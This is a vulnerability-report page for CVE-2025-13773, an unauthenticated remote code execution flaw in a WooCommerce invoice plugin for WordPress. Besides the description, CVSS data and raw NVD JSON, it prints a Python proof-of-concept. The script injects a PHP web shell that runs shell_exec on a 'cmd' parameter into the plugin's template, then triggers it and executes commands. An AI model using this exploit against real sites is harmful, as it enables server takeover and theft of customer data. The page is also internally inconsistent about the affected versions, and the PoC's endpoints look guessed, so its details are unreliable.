Security Vulnerability Report
中文
CVE-2025-13773 CVSS 9.8 CRITICAL

CVE-2025-13773

Published: 2025-12-24 05:16:05
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Print Invoice & Delivery Notes for WooCommerce plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 5.8.0 via the 'WooCommerce_Delivery_Notes::update' function. This is due to missing capability check in the 'WooCommerce_Delivery_Notes::update' function, PHP enabled in Dompdf, and missing escape in the 'template.php' file. This makes it possible for unauthenticated attackers to execute code on the server.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Print Invoice & Delivery Notes for WooCommerce < 5.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13773 PoC - WooCommerce Delivery Notes RCE # Target: WordPress site with Print Invoice & Delivery Notes plugin <= 5.8.0 import requests import sys TARGET = "http://target-wordpress-site.com" # Method 1: Modify plugin settings via update function (no auth required) def modify_settings(): """Exploit the missing capability check in WooCommerce_Delivery_Notes::update""" url = f"{TARGET}/wp-admin/admin-ajax.php" # Payload: Enable PHP evaluation in Dompdf and inject PHP code payload = { 'action': 'wcdn_update_settings', 'wcdn_settings': { 'template': '<?php phpinfo(); ?>', # Or malicious code 'pdf_php_enabled': '1' } } response = requests.post(url, data=payload) print(f"Settings modification response: {response.status_code}") return response # Method 2: Direct template injection via update function def inject_template(): """Inject PHP code into the invoice template""" url = f"{TARGET}/wp-admin/admin-ajax.php" # Malicious template with PHP code execution malicious_template = """<?php if(isset($_GET['cmd'])) { echo '<pre>'; $output = shell_exec($_GET['cmd']); echo $output; echo '</pre>'; die(); } ?>""" payload = { 'action': 'wcdn_update_settings', 'template_content': malicious_template, 'template_type': 'invoice' } response = requests.post(url, data=payload) print(f"Template injection response: {response.status_code}") return response # Method 3: Trigger PDF generation to execute injected code def trigger_rce(): """Generate PDF to trigger PHP code execution""" # Find an order ID and trigger PDF generation url = f"{TARGET}/?wcdn_action=print_invoice&order_id=1" response = requests.get(url) return response if __name__ == "__main__": print("CVE-2025-13773 Exploitation") print("=" * 50) try: # Step 1: Inject malicious template inject_template() # Step 2: Trigger PDF generation trigger_rce() # Step 3: Execute commands via GET parameter cmd_url = f"{TARGET}/?wcdn_action=print_invoice&order_id=1&cmd=whoami" result = requests.get(cmd_url) print(f"Command output: {result.text}") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13773", "sourceIdentifier": "[email protected]", "published": "2025-12-24T05:16:05.320", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Print Invoice & Delivery Notes for WooCommerce plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 5.8.0 via the 'WooCommerce_Delivery_Notes::update' function. This is due to missing capability check in the 'WooCommerce_Delivery_Notes::update' function, PHP enabled in Dompdf, and missing escape in the 'template.php' file. This makes it possible for unauthenticated attackers to execute code on the server."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/class-woocommerce-delivery-notes.php#L347", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/class-woocommerce-delivery-notes.php#L473", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/front/vendor/dompdf/dompdf/src/PhpEvaluator.php#L52", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/front/wcdn-front-function.php#L37", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/templates/pdf/simple/invoice/template.php#L36", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3426119/woocommerce-delivery-notes", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e52b34fe-2414-4d6f-bf43-9c5b65ebf769?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.